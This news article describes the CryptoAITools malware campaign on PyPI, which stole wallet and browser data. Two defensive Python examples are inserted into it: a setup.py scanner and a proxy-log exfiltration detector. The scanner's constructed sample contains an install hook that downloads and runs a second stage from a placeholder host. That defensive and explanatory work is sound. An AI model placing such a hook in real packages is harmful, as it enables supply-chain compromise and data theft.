
Invasive malware campaign on Python repository takes aim at cryptocurrency wallet data

The target of this campaign is mainly developers and cryptocurrency enthusiasts who may accidentally install these packages without realizing the danger.

Date: 2024-10-30 Author: Łukasz Michałek

Checkmarx's research team has uncovered a new invasive crypto-malware campaign in the Python Package Index (PyPI) repository. The scammers impersonate cryptocurrency trading tools in order to steal sensitive data and empty victims' cryptocurrency wallets.

Findings revealed that a malicious package named “CryptoAITools” was uploaded to PyPI and GitHub repositories, impersonating legitimate cryptocurrency trading tools.

The attacker used a fake graphical user interface (GUI) to distract victims while the malware carried out its malicious actions in the background. In addition, the malware activated itself automatically after installation and targeted both Windows and macOS.

“The CryptoAITools malware uses a sophisticated multi-step infection process, using a fake website to deliver its secondary payloads. After the initial infection via the PyPI package, the malware starts executing scripts separately for macOS and Windows systems.


“These scripts are responsible for downloading additional malicious components from the fake site,” the research team wrote.
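The install-time activation described above relies on a package running code during `pip install` rather than only when it is imported. The following added example (my own illustration, not Checkmarx's tooling or any code from the CryptoAITools package) statically scans a `setup.py` with Python's `ast` module and flags the patterns that make install-time execution possible: a custom setuptools command class registered through `cmdclass`, imports of networking or process-spawning modules, and dynamic `exec`/`eval`. The two sample `setup.py` sources embedded in the block are constructed for the demonstration; the hostname in the suspicious sample is a placeholder.

```python
import ast

# Constructed sample modelled on the "runs automatically after installation" pattern
# the article describes. It is synthetic, not the real CryptoAITools setup.py; the URL
# is a placeholder (.invalid TLD never resolves).
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess, platform, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        if platform.system() == "Windows":
            urllib.request.urlretrieve("https://example.invalid/stage2.py", "s.py")
        subprocess.Popen(["python", "s.py"])

setup(name="tool", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed benign sample: declarative metadata only, nothing runs at install time.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="tool", version="1.0", packages=["tool"])
'''

# Modules that have no business in package metadata but are typical of droppers.
RISKY_MODULES = {"subprocess", "urllib", "urllib.request", "requests", "socket", "base64", "ctypes"}
# setuptools commands that pip/setuptools invoke during an install or build.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
# Dynamic-execution builtins commonly used to hide a second stage.
RISKY_CALLS = {"exec", "eval", "compile", "__import__"}


def scan_setup_py(source: str) -> list[str]:
    """Return human-readable findings for install-time execution risks in a setup.py."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            # A subclass of setuptools' install/develop/... command runs when pip installs.
            for base in node.bases:
                name = base.attr if isinstance(base, ast.Attribute) else getattr(base, "id", "")
                if name in INSTALL_HOOK_BASES:
                    findings.append(
                        f"class '{node.name}' subclasses setuptools command '{name}': "
                        "its run() executes at install time")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in RISKY_MODULES or alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append(f"import of '{alias.name}' in setup.py")
        elif isinstance(node, ast.ImportFrom):
            module = node.module or ""
            if module in RISKY_MODULES or module.split(".")[0] in RISKY_MODULES:
                findings.append(f"import from '{module}' in setup.py")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in RISKY_CALLS:
                findings.append(f"dynamic execution via {func.id}()")
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            # Registering custom commands is how a hook class gets wired into pip install.
            findings.append("setup() overrides cmdclass")
    return findings


def is_suspicious(source: str) -> bool:
    """True when the setup.py contains an install hook or dynamic execution."""
    return any("install time" in f or "dynamic execution" in f for f in scan_setup_py(source))


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(f"[{label}] suspicious={is_suspicious(src)}")
        for finding in scan_setup_py(src):
            print("   -", finding)
```

Run it against an unpacked source distribution (`pip download --no-binary :all: <pkg>` then `tar xf`) before installing; a clean `setup.py` that only declares metadata yields no findings, whereas any custom command class is worth reading by hand. Wheels bypass `setup.py` entirely, so for wheel-only packages inspect the package's `__init__.py` for the same patterns instead.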

Checkmarx researcher Yehuda Gelb said in an analysis published earlier this month that the attacker targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus and other well-known cryptocurrency wallets.

“Presenting themselves as tools for mining mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users involved in recovery or wallet management.”

In addition, the CryptoAITools malware conducted an extensive data theft operation, attacking browser data such as saved passwords and browsing history. On macOS systems, the malware also attacked data from Apple Notes and Stickies applications.

The attackers began by harvesting data stored in users' home folders. The exfiltration script handles each file in turn, uploading it to gofile.io through that service's API.
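Uploads of home-directory files to a public file-sharing service are the observable half of that exfiltration step. The following added example (my own detection sketch, not part of the article or of Checkmarx's research) runs a simple rule over constructed proxy log lines: a POST to a file-sharing host from a scripted, non-browser user agent that sends more than a threshold of bytes is raised as an alert. The log format, the client addresses and the byte counts are all constructed for the demonstration; only the gofile.io domain comes from the article.

```python
import re
from dataclasses import dataclass

# Constructed proxy log lines (synthetic, not real telemetry). Assumed format:
# time client method host path status bytes_out "user-agent"
SAMPLE_LOG = """\
2024-10-30T10:01:02Z 10.0.0.12 GET pypi.org /simple/somepkg/ 200 512 "pip/24.0"
2024-10-30T10:01:09Z 10.0.0.12 GET api.gofile.io /servers 200 210 "python-requests/2.31.0"
2024-10-30T10:01:11Z 10.0.0.12 POST store1.gofile.io /contents/uploadfile 200 1843200 "python-requests/2.31.0"
2024-10-30T10:02:40Z 10.0.0.12 GET api.github.com /repos/x/y 200 800 "python-requests/2.31.0"
2024-10-30T10:03:00Z 10.0.0.17 GET gofile.io / 200 4000 "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) (\d+) (\d+) "([^"]*)"$')

# File-sharing services seen as exfiltration sinks; gofile.io is the one named in the article.
FILE_SHARING_DOMAINS = ("gofile.io",)
# User-agent prefixes of scripting HTTP clients rather than interactive browsers.
SCRIPTED_AGENT_PREFIXES = ("python-requests/", "python-urllib/", "curl/", "Wget/")
UPLOAD_BYTES_THRESHOLD = 100_000


@dataclass
class Alert:
    time: str
    client: str
    host: str
    bytes_out: int
    user_agent: str


def host_matches(host: str, domain: str) -> bool:
    """Match the domain itself and any subdomain (api.gofile.io, store1.gofile.io)."""
    return host == domain or host.endswith("." + domain)


def detect_scripted_uploads(log_text: str) -> list[Alert]:
    """Flag large POSTs to file-sharing hosts made by non-browser HTTP clients."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        time, client, method, host, _path, _status, bytes_out, agent = m.groups()
        if method != "POST":
            continue
        if not any(host_matches(host, d) for d in FILE_SHARING_DOMAINS):
            continue
        if not agent.startswith(SCRIPTED_AGENT_PREFIXES):
            continue
        if int(bytes_out) < UPLOAD_BYTES_THRESHOLD:
            continue
        alerts.append(Alert(time, client, host, int(bytes_out), agent))
    return alerts


if __name__ == "__main__":
    for a in detect_scripted_uploads(SAMPLE_LOG):
        print(f"ALERT {a.time} {a.client} -> {a.host} {a.bytes_out} bytes via {a.user_agent}")
```

The rule deliberately ignores the interactive browser visit to gofile.io from the second client, since a user sharing a file by hand is not the behaviour of interest; pairing the alert with the earlier `pip` fetch from the same client in the same minutes is what gives an analyst the supply-chain context.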

The attacker then distributes the link to the infected download through a Telegram bot, using a variety of lures to draw in potential victims.

“Our further investigation into this campaign revealed that the attacker used multiple infection vectors and social engineering tactics,” the team noted. “The attack is not limited to the malicious Python package on PyPI, but extends to other platforms and methods.”

The CryptoAITools malware campaign has serious consequences for victims and the broader cryptocurrency community, including immediate financial losses. The impact also includes long-term identity theft and privacy risks.

Łukasz Michałek
Founder of the rapidly developing cryptocurrency channel "Biblia Kryptowalut" on YouTube. He also co-creates the Arena Trading group with Marek. Łukasz is fascinated and passionate about blockchain technology and cryptocurrencies, which constitute the central element of his activity in the cryptocurrency industry.